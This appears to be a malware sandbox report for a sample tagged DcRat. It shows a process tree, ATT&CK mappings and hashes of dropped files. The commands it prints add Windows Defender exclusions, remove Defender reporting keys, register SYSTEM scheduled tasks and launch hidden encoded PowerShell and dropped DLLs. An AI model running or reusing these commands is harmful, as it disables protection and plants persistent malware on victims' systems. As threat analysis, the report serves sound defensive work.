C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7160 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:323⤵PID:6308
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:324⤵PID:6688
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:643⤵PID:4276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:323⤵PID:6396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:643⤵PID:7080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:323⤵PID:6416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:643⤵PID:3520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:323⤵PID:6420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:643⤵PID:6440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:323⤵PID:6432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:643⤵PID:6520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:323⤵PID:6504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:643⤵PID:6552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:6564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:6588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:323⤵PID:404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:643⤵PID:6628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:643⤵PID:6668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:323⤵PID:6604
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbzFHAGqR" /SC once /ST 03:22:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- DcRat
- Creates scheduled task(s)
PID:6756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbzFHAGqR"2⤵PID:5836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbzFHAGqR"2⤵PID:6420
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6464
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:20:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe\" KS /tcsite_idDGS 385119 /S" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6212 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6552
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyWbuVQzPmDmgkCMH"2⤵PID:6588
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:7100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:1020
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:500
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6832
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:6296
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3248
-
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exeC:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe KS /tcsite_idDGS 385119 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:6672 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"2⤵PID:168
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:6756
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:6912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2936
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4956
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\bWlzgM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\ucUuRll.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:6008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ztlTbPYifermRZH"2⤵PID:6248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ztlTbPYifermRZH"2⤵PID:2936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\kvnvOro.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:3476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\obLKYhY.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:6880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\PSUhcLe.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:6988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\oLySDfI.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:3904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 00:22:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\eOnZcghK\dUUvmRC.dll\",#1 /Aqsite_idnbu 385119" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "HKFMMLmWpeGdwIqGl"2⤵PID:2588
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:6760
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6656
-
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:6748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:6752
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4536
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"2⤵PID:5536
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5392
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\eOnZcghK\dUUvmRC.dll",#1 /Aqsite_idnbu 3851191⤵PID:5784
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\eOnZcghK\dUUvmRC.dll",#1 /Aqsite_idnbu 3851192⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:6116 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"3⤵PID:6800
-
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:7064
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:6896
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD500af039c782049b739f384c1123ddd37
SHA11c25763e54cdfc9d0a1f679d43fec22b2f2dd348
SHA256a6144a35bf64451adaedf009a0188771c30204240de4637a8f29136701cf040a
SHA512e1a8b942b3a09689f4ef315ec83fa62b777ccad242805c36dcc7023674420804aa3741eba581ec7f9365313a34972df6352c852952d7771705bfd19e64078f0a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD584bf890a7d478a64e60fa12d1a315958
SHA14450520f7ac40ff43de0f202cddda68cdb0aa87b
SHA25677f44c1260b7a5ba372e62c4972e23caf2bf84e02f6eb02fee52950b9b503aa4
SHA512a0f3e2408b54baa60dbc8074c114d4fc27d5733104c079d6f3582e3d6eced12d62ed207b56ea3c3096412abdfb5516c27cac9bb4940e47fb004f484b9c51ab06
-
Filesize
74KB
MD5d4fc49dc14f63895d997fa4940f24378
SHA13efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\RW8DX3II\B8BxsscfVBr[1].ico
Filesize1KB
MD5e508eca3eafcc1fc2d7f19bafb29e06b
SHA1a62fc3c2a027870d99aedc241e7d5babba9a891f
SHA256e6d1d77403cd9f14fd2377d07e84350cfe768e3353e402bf42ebdc8593a58c9a
SHA51249e3f31fd73e52ba274db9c7d306cc188e09c3ae683827f420fbb17534d197a503460e7ec2f1af46065f8d0b33f37400659bfa2ae165e502f97a8150e184a38c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\V4M6VAOE\suggestions[1].en-US
Filesize17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize4KB
MD51bfe591a4fe3d91b03cdf26eaacd8f89
SHA1719c37c320f518ac168c86723724891950911cea
SHA2569cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA51202f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\41R64P61\KFOlCnqEu92Fr1MmEU9vBg[1].woff2
Filesize49KB
MD508c655068d5dd3674b4f2eaacb470c03
SHA19430880adc2841ca12c163de1c1b3bf9f18c4375
SHA2564fc8591cc545b7b4f70d80b085bf6577fad41d5d30ddd4f0d0c8ab792084c35e
SHA512b2fce4bc018fa18de66095cc33d95455a4d544e93d512b02bcb8af06aadb550cd0f4aecbceaa013857196c91b6e3c4565a199835cfb37c682cb7bddb69420198
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\41R64P61\KFOlCnqEu92Fr1MmSU5vBg[1].woff2
Filesize49KB
MD58a62a215526d45866385d53ed7509ae8
SHA15f22bfd8ff7dab62ac11b76dee4ef04b419d59b5
SHA25634ccd21cf8cc2a2bdcd7dbe6bef05246067ff849bf71308e207bf525f581763d
SHA512845f721e564e03955c34607c9c9cf4000db46788313ebf27c1d12473c7948cf2609b08b24093c5d01f6c97acc79456e7aa838c291462bfb19700bbfd07ee243f
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\41R64P61\intersection-observer.min[1].js
Filesize5KB
MD5936a7c8159737df8dce532f9ea4d38b4
SHA18834ea22eff1bdfd35d2ef3f76d0e552e75e83c5
SHA2563ea95af77e18116ed0e8b52bb2c0794d1259150671e02994ac2a8845bd1ad5b9
SHA51254471260a278d5e740782524392249427366c56b288c302c73d643a24c96d99a487507fbe1c47e050a52144713dfeb64cd37bc6359f443ce5f8feb1a2856a70a
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\41R64P61\webcomponents-ce-sd[1].js
Filesize95KB
MD558b49536b02d705342669f683877a1c7
SHA11dab2e925ab42232c343c2cd193125b5f9c142fa
SHA256dea31a0a884a91f8f34710a646d832bc0edc9fc151ffd9811f89c47a3f4a6d7c
SHA512c7a70bdefd02b89732e12605ad6322d651ffa554e959dc2c731d817f7bf3e6722b2c5d479eb84bd61b6ee174669440a5fa6ac4083a173b6cf5b30d14388483d4
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\41R64P61\www-main-desktop-watch-page-skeleton[1].css
Filesize13KB
MD52344d9b4cd0fa75f792d298ebf98e11a
SHA1a0b2c9a2ec60673625d1e077a95b02581485b60c
SHA256682e83c4430f0a5344acb1239a9fce0a71bae6c0a49156dccbf42f11de3d007d
SHA5127a1ac40ad7c8049321e3278749c8d1474017740d4221347f5387aa14c5b01563bc6c7fd86f4d29fda8440deba8929ab7bb69334bb5400b0b8af436d736e08fab
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\DRWF1KAS\KFOmCnqEu92Fr1Me4A[1].woff2
Filesize49KB
MD5ee26c64c3b9b936cc1636071584d1181
SHA18efbc8a10d568444120cc0adf001b2d74c3a2910
SHA256d4d175f498b00516c629ce8af152cbe745d73932fa58cc9fdfc8e4b49c0da368
SHA512981a0d065c999eea3c61a2ba522cb64a0c11f0d0f0fe7529c917f956bce71e1622654d50d7d9f03f37774d8eee0370cfb8a86a0606723923b0e0061e1049cbc6
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\DRWF1KAS\desktop_polymer_enable_wil_icons[1].js
Filesize9.9MB
MD58ca9fac7776c395810fd3ee4a821dbcf
SHA18e68525b9e20092c8336d0fcf43fda569117fa03
SHA2560f82454ae1ed8abeab95da94ba833124f0b3c05415e31cd10400c036c65499f3
SHA512170e3ed5794bf404cead311c460be60db18db9cf71d846587cdb67d91bd312e7f3221a9a0f1940b6c8b109d304351761e7d22ab4d8cbed6ad9c3ed3e5b567ed7
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\DRWF1KAS\rs=AGKMywF2nbClGl-5_J3GnagT2STDJgq_Zg[1].css
Filesize213KB
MD51c39f2f0f1da1bb55a63c178aea861ee
SHA164f330e58c472932674434f880d0b6da8a992918
SHA25616181dccaa1d9a2c5e8daf37553fbaff8c756f532fc6177cbb242ec887fc38a8
SHA51200164346a06e98812e027872775fdb90f4435b08f0f75fa8160517de4f92904bb7228514d9ec981a6a1348ba21e4282be8e69f2e53843a3f70b082670b8467bd
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\DRWF1KAS\web-animations-next-lite.min[1].js
Filesize49KB
MD5cb9360b813c598bdde51e35d8e5081ea
SHA1d2949a20b3e1bc3e113bd31ccac99a81d5fa353d
SHA256e0cbfda7bfd7be1dcb66bbb507a74111fc4b2becbc742cd879751c3b4cbfa2f0
SHA512a51e7374994b6c4adc116bc9dea60e174032f7759c0a4ff8eef0ce1a053054660d205c9bb05224ae67a64e2b232719ef82339a9cad44138b612006975578783c
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OLDLU5DP\KFOlCnqEu92Fr1MmWUlvBg[1].woff2
Filesize49KB
MD590f0b37f809b546f34189807169e9a76
SHA1ee8c931951df57cd7b7c8758053c72ebebf22297
SHA2569dcacf1d025168ee2f84aaf40bad826f08b43c94db12eb59dbe2a06a3e98bfb2
SHA512bd5ff2334a74edb6a68a394096d9ae01bd744d799a49b33e1fd95176cbec8b40d8e19f24b9f424f43b5053f11b8dd50b488bffedd5b04edbaa160756dd1c7628
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OLDLU5DP\css2[1].css
Filesize2KB
MD584d3f5474bafdc0914cd457203eefe4d
SHA144fab3b0f2229f96bfae8ff4dd71f39c3c4043c3
SHA256914015cac1ab3f912a9787e9b7768739d12ca490d8f40ca964e36a052ecd3037
SHA5125a78adb470706ac61565d3b6732227bc4f944a8505de054a18acb5a2da319512b3e401c45c7ba625e5a5d5ed7d3122e81f0653a61b55d47abf7fb4ee4d115877
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OLDLU5DP\www-main-desktop-home-page-skeleton[1].css
Filesize12KB
MD5770c13f8de9cc301b737936237e62f6d
SHA146638c62c9a772f5a006cc8e7c916398c55abcc5
